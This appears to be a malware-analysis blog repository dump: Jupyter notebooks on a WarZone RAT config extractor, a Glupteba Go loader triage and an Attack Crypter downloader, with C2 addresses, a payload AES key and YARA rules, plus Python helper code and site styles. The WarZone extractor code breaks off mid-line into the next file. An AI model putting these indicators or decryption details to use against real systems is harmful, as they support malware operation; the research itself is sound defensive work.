99 | "#### rt.jpg\n",
100 | "This is a simple startup function for an open source userland rootkit that can be found on GitHub [r77-rootkit](https://github.com/bytecode77/r77-rootkit).\n",
101 | "\n",
102 | "## Server Misconfiguration\n",
103 | "It's almost like the developer knows they made some mistakes...\n",
104 | "\n",
105 | "\n",
106 | "### Laravel Debugger Exposed\n",
107 | "A typo in one of the C2 URLs exposed a server error with a full stack trace. This revealed that the developer was uing the [laravel](https://laravel.com/) PHP framework and had left the debugger publically exposed.\n",
108 | "\n",
109 | "\n",
110 | "### Open Directory\n",
111 | "The stack trace led to the discovery that the server root had been configured as an open directory with many files publicly served to the Internet including logs.\n",
112 | ""
113 | ]
114 | },
115 | {
116 | "cell_type": "markdown",
117 | "id": "76aa2654-5e1b-4b7e-9df0-c957da3c79e6",
118 | "metadata": {},
119 | "source": [
120 | "**Analysis Stopped:** \n",
121 | "\n",
122 | "There are more files and download links that could be investigated but the malware is so simple and the server configured so poorly we stopped our analysis. This malware looks more like a hobby project than a professional business..."
123 | ]
124 | },
125 | {
126 | "cell_type": "code",
127 | "execution_count": null,
128 | "id": "3d9e2ac2-f29f-4a28-b513-562c6508e2b6",
129 | "metadata": {},
130 | "outputs": [],
131 | "source": []
132 | }
133 | ],
134 | "metadata": {
135 | "kernelspec": {
136 | "display_name": "Python 3",
137 | "language": "python",
138 | "name": "python3"
139 | },
140 | "language_info": {
141 | "codemirror_mode": {
142 | "name": "ipython",
143 | "version": 3
144 | },
145 | "file_extension": ".py",
146 | "mimetype": "text/x-python",
147 | "name": "python",
148 | "nbconvert_exporter": "python",
149 | "pygments_lexer": "ipython3",
150 | "version": "3.9.5"
151 | }
152 | },
153 | "nbformat": 4,
154 | "nbformat_minor": 5
155 | }
156 |
--------------------------------------------------------------------------------
/_notebooks/2021-05-31-warzone_rat_config.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "593e8507-8d38-42f1-9449-60f1a89d4da0",
6 | "metadata": {},
7 | "source": [
8 | "# WarZone RAT \n",
9 | "> WarZone static config extractor\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [warzone,malware,config]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "7393edcb-38c6-4f02-a72d-98ce109502e5",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "The config is stored in the `.bss` PE section with the following format.\n",
24 | "\n",
25 | "Key length | key | data\n",
26 | "\n"
27 | ]
28 | },
29 | {
30 | "cell_type": "code",
31 | "execution_count": 25,
32 | "id": "be322404-96a4-46ab-b93f-1a3ab3722fa5",
33 | "metadata": {},
34 | "outputs": [],
35 | "source": [
36 | "# First lets setup our imports\n",
37 | "import argparse\n",
38 | "import struct\n",
39 | "import pefile\n",
40 | "import re\n",
41 | "import binascii"
42 | ]
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "id": "8800c159-3130-400b-bc1f-00d7f11fe968",
47 | "metadata": {},
48 | "source": [
49 | "Now a quick reminder ddof binary data hex encoding for Python3"
50 | ]
51 | },
52 | {
53 | "cell_type": "markdown",
54 | "id": "581df870-90dc-4c2b-af87-66ace7987b1e",
55 | "metadata": {},
56 | "source": [
57 | "## RC4 Encryption\n",
58 | "The data is encrypted using RC4. For more information on RC4 check out our RC4 tutorial video.\n",
59 | "\n",
60 | "> youtube: https://youtu.be/CiJocXXMXK4"
61 | ]
62 | },
63 | {
64 | "cell_type": "code",
65 | "execution_count": 26,
66 | "id": "40e72184-8fb2-40e3-a84a-463379a48ade",
67 | "metadata": {
68 | "tags": []
69 | },
70 | "outputs": [],
71 | "source": [
72 | "# Now lets implement a simple RC4 decryption function\n",
73 | "def rc4crypt(data, key):\n",
74 | " #If the input is a string convert to byte arrays\n",
75 | " if type(data) == str:\n",
76 | " data = data.encode('utf-8')\n",
77 | " if type(key) == str:\n",
78 | " key = key.encode('utf-8')\n",
79 | " x = 0\n",
80 | " box = list(range(256))\n",
81 | " for i in range(256):\n",
82 | " x = (x + box[i] + key[i % len(key)]) % 256\n",
83 | " box[i], box[x] = box[x], box[i]\n",
84 | " x = 0\n",
85 | " y = 0\n",
86 | " out = []\n",
87 | " for c in data:\n",
88 | " x = (x + 1) % 256\n",
89 | " y = (y + box[x]) % 256\n",
90 | " box[x], box[y] = box[y], box[x]\n",
91 | " out.append(c ^ box[(box[x] + box[y]) % 256])\n",
92 | " return bytes(out)"
93 | ]
94 | },
95 | {
96 | "cell_type": "markdown",
97 | "id": "63c05d4d-b9f9-4fef-9e77-3ed85f19d043",
98 | "metadata": {},
99 | "source": [
100 | "## Helper functions"
101 | ]
102 | },
103 | {
104 | "cell_type": "code",
105 | "execution_count": 32,
106 | "id": "f0c2018f-45c2-4a57-8857-614bb601b71d",
107 | "metadata": {
108 | "tags": []
109 | },
110 | "outputs": [],
111 | "source": [
112 | "import binascii\n",
113 | "data = binascii.unhexlify(b'')\n",
114 | "key = binascii.unhexlify(b'')\n",
115 | "\n",
116 | "def unicode_strings(buf, n=4):\n",
117 | " import re\n",
118 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
119 | " if type(buf) == str:\n",
120 | " buf = buf.encode('utf-8')\n",
121 | " reg = b'((?:[%s]\\x00){%d,})' % (ASCII_BYTE, n)\n",
122 | " uni_re = re.compile(reg)\n",
123 | " out = []\n",
124 | " for match in uni_re.finditer(buf):\n",
125 | " try:\n",
126 | " out.append(match.group().decode(\"utf-16\"))\n",
127 | " except UnicodeDecodeError:\n",
128 | " continue\n",
129 | " return out\n",
130 | "\n",
131 | "def tohex(data):\n",
132 | " import binascii\n",
133 | " if type(data) == str:\n",
134 | " return binascii.hexlify(data.encode('utf-8'))\n",
135 | " else:\n",
136 | " return binascii.hexlify(data)"
137 | ]
138 | },
139 | {
140 | "cell_type": "code",
141 | "execution_count": 43,
142 | "id": "5043ce7a-5966-49eb-98a8-f2075c59acb4",
143 | "metadata": {},
144 | "outputs": [
145 | {
146 | "name": "stdout",
147 | "output_type": "stream",
148 | "text": [
149 | "host: 165.22.5.66, port: 1111\n"
150 | ]
151 | }
152 | ],
153 | "source": [
154 | "import pefile\n",
155 | "import struct\n",
156 | "\n",
157 | "warzone_file = b'/tmp/work/warzone.bin'\n",
158 | "data = open(warzone_file, 'rb').read()\n",
159 | "pe = pefile.PE(data=data)\n",
160 | "section_data = None\n",
161 | "for s in pe.sections:\n",
162 | " if s.Name == b'.bss\\x00\\x00\\x00\\x00':\n",
163 | " section_data = s.get_data()\n",
164 | "## size (DWORD) | key | data\n",
165 | "key_size = struct.unpack(' Investigating this elusive GO loader\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [Glubteba,loader,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "0735d30c-0ccf-4d60-bc37-97643ef5095d",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Taking a look at some random GO malware with light obfuscation. Possibly linked to Glubteba.\n",
24 | "\n",
25 | "According to [Sophos](https://news.sophos.com/wp-content/uploads/2020/06/glupteba_final-1.pdf) there are 3 possible GO components linked to a Glupteba infection.\n",
26 | "\n",
27 | "- `payload64.dll` - a 64bit payload used along with the EternalBlue exploit to download the main Glupteba component\n",
28 | "- `payload32.dll` - a 32bit payload used along with the EternalBlue exploit to download the main Glupteba component\n",
29 | "- `collectchromefingerprint.exe` - a UPX packed binary used to locate Chrome and connect to `http[:]//swebgames[.]site/test.php?uuid=%s&browser=chrome` to register to browser-based fingerprinting services\n",
30 | "\n",
31 | "\n",
32 | "## References \n",
33 | "\n",
34 | "- [Glupteba: Hidden Malware Delivery in Plain Sight (pdf)](https://news.sophos.com/wp-content/uploads/2020/06/glupteba_final-1.pdf)\n",
35 | "- [Disrupting the Glupteba operation](https://blog.google/threat-analysis-group/disrupting-glupteba-operation/)\n",
36 | "- [Tracking Malicious Glupteba Activity Through the Blockchain](https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/)\n",
37 | "\n",
38 | "\n",
39 | "### Sample\n",
40 | "- [3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961](https://www.unpac.me/results/8674879c-122d-4973-b45a-22a0f8217d95?hash=3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961#/)\n",
41 | "- not glupteba but possibly similar obfuscator [dd124a7b396150e4d8275c473594e47ac24606ef0955e2c13310aac9045554ac](https://www.unpac.me/results/c2d49f20-7bd7-48af-b5f6-4ead73d3790f?hash=dd124a7b396150e4d8275c473594e47ac24606ef0955e2c13310aac9045554ac#/)"
42 | ]
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "id": "dfab0373-0561-46d7-a238-d32e0d6e1966",
47 | "metadata": {},
48 | "source": [
49 | "## Analysis\n",
50 | "Looking through the Glupteba IOCs [released by Sophos](https://github.com/sophoslabs/IoCs/blob/master/Trojan-Glupteba) we can see two hashes labeled as `app.exe` which is the main component of Glupteba according to their report.\n",
51 | "\n",
52 | "- `407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71` [UnpacMe](https://www.unpac.me/results/9754bb3a-2e48-4e8d-b3f0-b8d040bf7a43?hash=407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71#/)\n",
53 | "- `83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29` [UnpacMe](https://www.unpac.me/results/d6e7585a-69e5-4946-9e22-f6846b9c1c13?hash=83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29#/)\n",
54 | "\n",
55 | "Upon analysis, both of these appear to be the 32-bit version of the payload delivered by the EternalBlue SMB exploit `payload32.dll`. One packed with UPX and the other not packed. This lead to some confusion as it is unclear in the report if this is considered the main Glubteba component. \n",
56 | "\n",
57 | "Comparing these samples with our sample `3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961` we can see some overlap in functionality but our sample contains significantly more features including anti-analysis checks and a TOR browser and appears to better match with the full Glupteba functionally listed in the Sophos report. It is unclear if this module was part of the original Glupteba build analyzed by Sophos in 2020 or if it is a new build however it appears to now be the main Glupteba module. \n",
58 | "\n",
59 | "\n",
60 | "## Yara\n",
61 | "```c\n",
62 | "rule glub_hunt {\n",
63 | " strings:\n",
64 | "\n",
65 | " $report1 = \"main.reportInstallFailure\"\n",
66 | " $report2 = \"main.sendLog\"\n",
67 | " $report3 = \"main.sendLogError\"\n",
68 | " \n",
69 | " $anti1 = \"main.isRunningInsideVirtualBox\"\n",
70 | " $anti2 = \"main.isRunningInsideVMWare\"\n",
71 | " $anti3 = \"main.isRunningInsideParallels\"\n",
72 | " $anti4 = \"main.isRunningInsideVirtualPC\"\n",
73 | " $anti5 = \"main.isRunningInsideXen\"\n",
74 | " $anti6 = \"main.isRunningInsideAnyRun\"\n",
75 | " $anti7 = \"main.isRunningInsideVM\"\n",
76 | " \n",
77 | " $smb1 = \"main.handleConnSMB\"\n",
78 | " $smb2 = \"main.handleConnSMB.func1\"\n",
79 | " $smb3 = \"main.listenAndServeSMB\"\n",
80 | " $smb4 = \"main.listenAndServeSMB.func2\"\n",
81 | " $smb5 = \"main.listenAndServeSMB.func1\"\n",
82 | " $smb6 = \"main.watchSMB\"\n",
83 | " \n",
84 | " $tor1 = \"main.watchTor\"\n",
85 | " $tor2 = \"main.watchTor.func1\"\n",
86 | " $tor3 = \"main.watchTor.func2\"\n",
87 | " \n",
88 | " $drv1 = \"main.createDevice\"\n",
89 | " $drv2 = \"main.excludeFilename\"\n",
90 | " $drv3 = \"main.excludeFilename.func1\"\n",
91 | " $drv4 = \"main.disablePatchGuard\"\n",
92 | " $drv5 = \"main.disablePatchGuard.func1\"\n",
93 | "\n",
94 | " condition:\n",
95 | " filesize > 7MB and\n",
96 | " filesize < 10MB and\n",
97 | " 5 of them\n",
98 | "}\n",
99 | "```"
100 | ]
101 | },
102 | {
103 | "cell_type": "code",
104 | "execution_count": null,
105 | "id": "222157ef-1ec3-482f-bbdc-b738494266a8",
106 | "metadata": {},
107 | "outputs": [],
108 | "source": []
109 | }
110 | ],
111 | "metadata": {
112 | "kernelspec": {
113 | "display_name": "Python 3",
114 | "language": "python",
115 | "name": "python3"
116 | },
117 | "language_info": {
118 | "codemirror_mode": {
119 | "name": "ipython",
120 | "version": 3
121 | },
122 | "file_extension": ".py",
123 | "mimetype": "text/x-python",
124 | "name": "python",
125 | "nbconvert_exporter": "python",
126 | "pygments_lexer": "ipython3",
127 | "version": "3.9.5"
128 | }
129 | },
130 | "nbformat": 4,
131 | "nbformat_minor": 5
132 | }
133 |
--------------------------------------------------------------------------------
/_notebooks/2023-08-27-attack-crypter.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "7697c16f-5071-476c-8c65-b6eb2a5cf1d4",
6 | "metadata": {},
7 | "source": [
8 | "# Attack Crypter\n",
9 | "> An open source travesty used to drop .NET stealers\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [attack crypter,downloader,dotnet,open source]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "45ff0fc5-ab9a-4f26-b968-c4899141d965",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "AttackCrypt is an open source \"crypter\" project that can be used to \"protect\" binaries and \"prevent\" detection by AV. In the words of the developer...\n",
23 | "> I don t know how much This will stay FUD but will be updating it always and adding New Injection and new Attacks to it\n",
24 | "\n",
25 | "This crypter has recently been used to \"protect\" VenomRAT and is actively in use in the wild.\n",
26 | "\n",
27 | "GitHub: [Theattacker-Crypter](https://github.com/TheNewAttacker64/Theattacker-Crypter)\n",
28 | "\n",
29 | "\n",
30 | "\n",
31 | "## Sample\n",
32 | "[11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442](https://www.unpac.me/results/99994980-a37e-4c4e-bc23-4e62da9461fb/#/)\n",
33 | "\n",
34 | "## References \n",
35 | "- [Attacker-Crypter (v0.9): Unveiling a Powerful Tool for Evading Antivirus and Enhancing Malware Capabilities](https://www.cyfirma.com/outofband/attacker-crypter-v0-9-unveiling-a-powerful-tool-for-evading-antivirus-and-enhancing-malware-capabilities/)\n",
36 | "\n"
37 | ]
38 | },
39 | {
40 | "cell_type": "markdown",
41 | "id": "f680921f-2a3d-4d78-98d7-b9ac251d6eba",
42 | "metadata": {},
43 | "source": [
44 | "## Analysis\n",
45 | "\n",
46 | "The crypter uses a generated mutex to ensure only one version of the payload is installed, but this mutex is not random it is prepended with the string `attackercrypter` lol!\n",
47 | "\n",
48 | "The crypter also claims to have anti-vm checks which are optional... these are simply a *manufactor* check via WMI `Select * from Win32_ComputerSystem`.\n",
49 | "\n",
50 | "```c#\n",
51 | "if ((manufacturer == \"microsoft corporation\" && item[\"Model\"].ToString().ToUpperInvariant().Contains(\"VIRTUAL\"))\n",
52 | " || manufacturer.Contains(\"vmware\")\n",
53 | " || item[\"Model\"].ToString() == \"VirtualBox\")\n",
54 | "```\n",
55 | "\n",
56 | "### Payload Decryption\n",
57 | "\n",
58 | "**Spoiler alert this is not really a cryptor lol!** Instead of protecting the payload the tool converts it into encrypted data that is stored as a string. This string must then be uploaded to a \"drop site\" but the operator and then the \"drop site\" URL placed in the tool to generate the \"stub\". This \"stub\" is not a stub it is actually just a downloader that will fetch the payload, decrypt it, and load it.\n",
59 | "\n",
60 | "This is the opposite of what you would like in a crypter as the loader will actually look the same for every \"build\". Let's check in on the VT detection rate in a week: [11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442](https://www.virustotal.com/gui/file/11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442).\n",
61 | "\n",
62 | "In this sample the drop site is `http[:]//paste.sensio[.]no/ReplicaSerena`\n",
63 | "\n",
64 | "An example of the \"encrypted\" data follows.\n",
65 | "\n",
66 | "```\n",
67 | "'Y','A','K','F','E','x','y','o','2','y','v','U','B','Z','N','C','q','R','j','O','l','Y'\n",
68 | "```\n",
69 | "\n",
70 | "#### Decryption\n",
71 | "\n",
72 | "[Cyber Chef link](https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'%5C''%7D,'',true,false,true,false)Find_/_Replace(%7B'option':'Simple%20string','string':','%7D,'',true,false,true,false)Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt(%7B'option':'Base64','string':'cT0j6Iw9VylE9o8lcfS4/Bcb8loeSeBirgvin5wpiwg%3D'%7D,%7B'option':'Base64','string':'0SRVQvZDd6l4hBTnn%2BE0TQ%3D%3D'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D))\n",
73 | "\n",
74 | "\n",
75 | "- Remove `,` and `'` from the string (deobfuscate)\n",
76 | "- Reverse the string\n",
77 | "- Base64 decode\n",
78 | "- Decrypt with hard coded key and IV (AES CBC)\n",
79 | " - The key and IV are base64 encoded \n",
80 | "\n",
81 | "In this sample the Key is `cT0j6Iw9VylE9o8lcfS4/Bcb8loeSeBirgvin5wpiwg=` and the IV is `0SRVQvZDd6l4hBTnn+E0TQ==`."
82 | ]
83 | },
84 | {
85 | "cell_type": "markdown",
86 | "id": "a89ca8a3-989e-4773-8225-a2d80f34bd82",
87 | "metadata": {},
88 | "source": [
89 | "## Yara Rule\n",
90 | "\n",
91 | "```c\n",
92 | "rule AttackCrypter {\n",
93 | " strings:\n",
94 | " \n",
95 | " $s1 = \"attackercrypter\" wide\n",
96 | " $s2 = \"$FOLDER\" wide\n",
97 | " $s3 = \"$FNAME.exe\" wide\n",
98 | " $s4 = \"$service\" wide\n",
99 | " $s5 = \"$serverpassword\" wide\n",
100 | " $s6 = \"$bottoken\" wide\n",
101 | " $s7 = \"$chatid\" wide\n",
102 | " $s8 = \"#NATIVEINJECTPATH\" wide\n",
103 | " $s9 = \"#DOTNETINJECTPATH\" wide\n",
104 | " $s10 = \"https://api.telegram.org/bot\" wide\n",
105 | " $s11 = \"Don t use on vm\" wide\n",
106 | " \n",
107 | " $m1 = \"FOKFILE\" ascii\n",
108 | " $m2 = \"FOKSTRING\" ascii\n",
109 | " $m3 = \"NIKBINARY32bit\" ascii\n",
110 | " $m4 = \"NIKFELSTART\" ascii\n",
111 | " \n",
112 | " condition:\n",
113 | " 5 of ($s*) and\n",
114 | " any of ($m*)\n",
115 | "}\n",
116 | "```\n"
117 | ]
118 | },
119 | {
120 | "cell_type": "code",
121 | "execution_count": null,
122 | "id": "838b0142-0bef-4cbc-b100-9a30b68e8d92",
123 | "metadata": {},
124 | "outputs": [],
125 | "source": []
126 | }
127 | ],
128 | "metadata": {
129 | "kernelspec": {
130 | "display_name": "Python 3",
131 | "language": "python",
132 | "name": "python3"
133 | },
134 | "language_info": {
135 | "codemirror_mode": {
136 | "name": "ipython",
137 | "version": 3
138 | },
139 | "file_extension": ".py",
140 | "mimetype": "text/x-python",
141 | "name": "python",
142 | "nbconvert_exporter": "python",
143 | "pygments_lexer": "ipython3",
144 | "version": "3.9.5"
145 | }
146 | },
147 | "nbformat": 4,
148 | "nbformat_minor": 5
149 | }
150 |
--------------------------------------------------------------------------------
/_notebooks/2021-06-27-python3_examples.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "8de89089-3acb-45c8-b245-d6dbb131c21a",
6 | "metadata": {},
7 | "source": [
8 | "# Python3 Tips and Sample Code\n",
9 | "> Some helpful code for binary manipulation with Python3\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [python,python3,tips,research]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "e77f323f-a482-487d-88a1-0dd523fb7319",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Python2.7 is like second nature to me now and I keep getting hung up on the idiotic typing that Python3 has introduced. Hopefully these examples will help."
24 | ]
25 | },
26 | {
27 | "cell_type": "markdown",
28 | "id": "65de0a09-f8ee-4c26-8924-6d1a818ef9c0",
29 | "metadata": {},
30 | "source": [
31 | "## Binary Data and Hex Ecoding"
32 | ]
33 | },
34 | {
35 | "cell_type": "code",
36 | "execution_count": 3,
37 | "id": "e28ae511-472c-43d0-a942-01abac575d09",
38 | "metadata": {},
39 | "outputs": [
40 | {
41 | "name": "stdout",
42 | "output_type": "stream",
43 | "text": [
44 | "b'test'\n",
45 | "test\n",
46 | "b'74657374'\n",
47 | "b'74657374'\n",
48 | "74657374\n",
49 | "b'test'\n",
50 | "b'test'\n",
51 | "test\n"
52 | ]
53 | }
54 | ],
55 | "source": [
56 | "import binascii\n",
57 | "\n",
58 | "string_example = \"test\"\n",
59 | "byte_array_example = b\"test\"\n",
60 | "\n",
61 | "# Convert string into bytes\n",
62 | "print(string_example.encode('utf-8'))\n",
63 | "\n",
64 | "# Convert byte array into string\n",
65 | "print(byte_array_example.decode('utf-8'))\n",
66 | "\n",
67 | "# Convert string into hex encoded byte array\n",
68 | "print(binascii.hexlify(string_example.encode('utf-8')))\n",
69 | "\n",
70 | "# Convert byte array into hex encoded byte array\n",
71 | "print(binascii.hexlify(byte_array_example))\n",
72 | "\n",
73 | "# Convert byte array into hex encoded string\n",
74 | "print(binascii.hexlify(byte_array_example).decode('utf-8'))\n",
75 | "\n",
76 | "# Convert hex encoded byte array into ascii byte array\n",
77 | "hex_byte_array = b'74657374'\n",
78 | "print(binascii.unhexlify(hex_byte_array))\n",
79 | "\n",
80 | "# Convert hex encoded string into ascii byte array\n",
81 | "hex_string = '74657374'\n",
82 | "print(binascii.unhexlify(hex_string.encode('utf-8')))\n",
83 | "\n",
84 | "# Convert hex encoded string into ascii string\n",
85 | "hex_string = '74657374'\n",
86 | "print(binascii.unhexlify(hex_string.encode('utf-8')).decode('utf-8'))"
87 | ]
88 | },
89 | {
90 | "cell_type": "markdown",
91 | "id": "1212dbd0-5329-4cc0-b239-c70be929715e",
92 | "metadata": {},
93 | "source": [
94 | "## Hex Encoding Helper Functions"
95 | ]
96 | },
97 | {
98 | "cell_type": "code",
99 | "execution_count": 4,
100 | "id": "85c49337-45fd-400c-b748-cf67f1204a28",
101 | "metadata": {},
102 | "outputs": [],
103 | "source": [
104 | "def unhex(hex_string):\n",
105 | " import binascii\n",
106 | " if type(hex_string) == str:\n",
107 | " return binascii.unhexlify(hex_string.encode('utf-8'))\n",
108 | " else:\n",
109 | " return binascii.unhexlify(hex_string)\n",
110 | "\n",
111 | "def tohex(data):\n",
112 | " import binascii\n",
113 | " if type(data) == str:\n",
114 | " return binascii.hexlify(data.encode('utf-8'))\n",
115 | " else:\n",
116 | " return binascii.hexlify(data)\n"
117 | ]
118 | },
119 | {
120 | "cell_type": "markdown",
121 | "id": "9c45b266-5d99-4eb9-bf90-fab386af5d4e",
122 | "metadata": {},
123 | "source": [
124 | "## Strings Functions"
125 | ]
126 | },
127 | {
128 | "cell_type": "code",
129 | "execution_count": 6,
130 | "id": "43d5649e-32d6-4763-b032-ff70a9f13c58",
131 | "metadata": {},
132 | "outputs": [],
133 | "source": [
134 | "def unicode_strings(buf, n=4):\n",
135 | " import re\n",
136 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
137 | " if type(buf) == str:\n",
138 | " buf = buf.encode('utf-8')\n",
139 | " reg = b'((?:[%s]\\x00){%d,})' % (ASCII_BYTE, n)\n",
140 | " uni_re = re.compile(reg)\n",
141 | " out = []\n",
142 | " for match in uni_re.finditer(buf):\n",
143 | " try:\n",
144 | " out.append(match.group().decode(\"utf-16\"))\n",
145 | " except UnicodeDecodeError:\n",
146 | " pass\n",
147 | " return out\n",
148 | "\n",
149 | "\n",
150 | "def ascii_strings(buf, n=4):\n",
151 | " import re\n",
152 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
153 | " if type(buf) == str:\n",
154 | " buf = buf.encode('utf-8')\n",
155 | " reg = b'([%s]{%d,})' % (ASCII_BYTE, n)\n",
156 | " ascii_re = re.compile(reg)\n",
157 | " out = []\n",
158 | " for match in ascii_re.finditer(buf):\n",
159 | " try:\n",
160 | " out.append(match.group().decode(\"ascii\"))\n",
161 | " except UnicodeDecodeError:\n",
162 | " pass\n",
163 | " return out"
164 | ]
165 | },
166 | {
167 | "cell_type": "code",
168 | "execution_count": 1,
169 | "id": "fce80936-c3f0-4e25-9182-785f8a64d6ad",
170 | "metadata": {},
171 | "outputs": [
172 | {
173 | "name": "stdout",
174 | "output_type": "stream",
175 | "text": [
176 | "test\n"
177 | ]
178 | }
179 | ],
180 | "source": [
181 | "test_var = \"test\"\n",
182 | "print(test_var)"
183 | ]
184 | },
185 | {
186 | "cell_type": "code",
187 | "execution_count": null,
188 | "id": "95aee5db-d17e-4fc0-9d40-ccd0859ec0ca",
189 | "metadata": {},
190 | "outputs": [],
191 | "source": []
192 | }
193 | ],
194 | "metadata": {
195 | "kernelspec": {
196 | "display_name": "Python 3",
197 | "language": "python",
198 | "name": "python3"
199 | },
200 | "language_info": {
201 | "codemirror_mode": {
202 | "name": "ipython",
203 | "version": 3
204 | },
205 | "file_extension": ".py",
206 | "mimetype": "text/x-python",
207 | "name": "python",
208 | "nbconvert_exporter": "python",
209 | "pygments_lexer": "ipython3",
210 | "version": "3.9.5"
211 | }
212 | },
213 | "nbformat": 4,
214 | "nbformat_minor": 5
215 | }
216 |
--------------------------------------------------------------------------------
/_sass/minima/fastpages-styles.scss:
--------------------------------------------------------------------------------
1 | //Default Overrides For Styles In Minima
2 | // If you wish to override any of this CSS, do so in _sass/minima/custom-styles.css
3 |
4 | .post img {
5 | display: block;
6 | // border:1px solid #021a40;
7 | vertical-align: top;
8 | margin-left: auto;
9 | margin-right: auto;
10 | }
11 |
12 | img.emoji{
13 | display: inline !important;
14 | vertical-align: baseline !important;
15 | }
16 |
17 | .post figcaption {
18 | text-align: center;
19 | font-size: .8rem;
20 | font-style: italic;
21 | color: light-grey;
22 | }
23 |
24 | .page-content {
25 | -webkit-font-smoothing: antialiased !important;
26 | text-rendering: optimizeLegibility !important;
27 | font-family: "Segoe UI", SegoeUI, Roboto, "Segoe WP", "Helvetica Neue", "Helvetica", "Tahoma", "Arial", sans-serif !important;
28 | }
29 |
30 | // make non-headings slightly lighter
31 | .post-content p, .post-content li {
32 | font-size: 20px;
33 | color: #515151;
34 | }
35 |
36 | .post-link{
37 | font-weight: normal;
38 | }
39 |
40 | // change padding of headings
41 | h1 {
42 | margin-top:2.5rem !important;
43 | }
44 |
45 | h2 {
46 | margin-top:2rem !important;
47 | }
48 |
49 | h3, h4 {
50 | margin-top:1.5rem !important;
51 | }
52 |
53 | p {
54 | margin-top:1rem !important;
55 | margin-bottom:1rem !important;
56 | }
57 |
58 | h1, h2, h3, h4 {
59 | font-weight: normal !important;
60 | margin-bottom:0.5rem !important;
61 | code {
62 | font-size: 100%;
63 | }
64 | }
65 |
66 | pre {
67 | margin-bottom:1.5rem !important;
68 | }
69 |
70 | // make sure the post title doesn't have too much spacing
71 | .post-title { margin-top: .5rem !important; }
72 |
73 | li {
74 | h3, h4 {
75 | margin-top:.05rem !important;
76 | margin-bottom:.05rem !important;
77 | }
78 | .post-meta-description {
79 | color: rgb(88, 88, 88);
80 | font-size: 15px;
81 | margin-top:.05rem !important;
82 | margin-bottom:.05rem !important;
83 | }
84 | }
85 |
86 |
87 |
88 | // Code Folding
89 | details.description[open] summary::after {
90 | content: attr(data-open);
91 | }
92 |
93 | details.description:not([open]) summary::after {
94 | content: attr(data-close);
95 | }
96 |
97 | // Notebook badges
98 | .notebook-badge-image {
99 | border:0 !important;
100 | }
101 |
102 | // Adjust font size for footnotes.
103 | .footnotes {
104 | font-size: 12px !important;
105 | p, li{
106 | font-size: 12px !important;
107 | }
108 | }
109 |
110 | // Adjust with of social media icons were getting cut off
111 | .social-media-list{
112 | .svg-icon {
113 | width: 25px !important;
114 | height: 23px !important;
115 | }
116 | }
117 |
118 | // Make Anchor Links Appear Only on Hover
119 |
120 | .anchor-link {
121 | opacity: 0;
122 | padding-left: 0.375em;
123 | \-webkit-text-stroke: 1.75px white;
124 | \-webkit-transition: opacity 0.2s ease-in-out 0.1s;
125 | \-moz-transition: opacity 0.2s ease-in-out 0.1s;
126 | \-ms-transition: opacity 0.2s ease-in-out 0.1s;
127 | }
128 |
129 | h1:hover .anchor-link,
130 | h2:hover .anchor-link,
131 | h3:hover .anchor-link,
132 | h4:hover .anchor-link,
133 | h5:hover .anchor-link,
134 | h6:hover .anchor-link {
135 | opacity: 1;
136 | }
137 |
138 |
139 | // category tags
140 | .category-tags {
141 | margin-top: .25rem !important;
142 | margin-bottom: .25rem !important;
143 | font-size: 105%;
144 | }
145 |
146 | // Custom styling for homepage post previews
147 | .post-meta-title, .post-meta{
148 | margin-top: .25em !important;
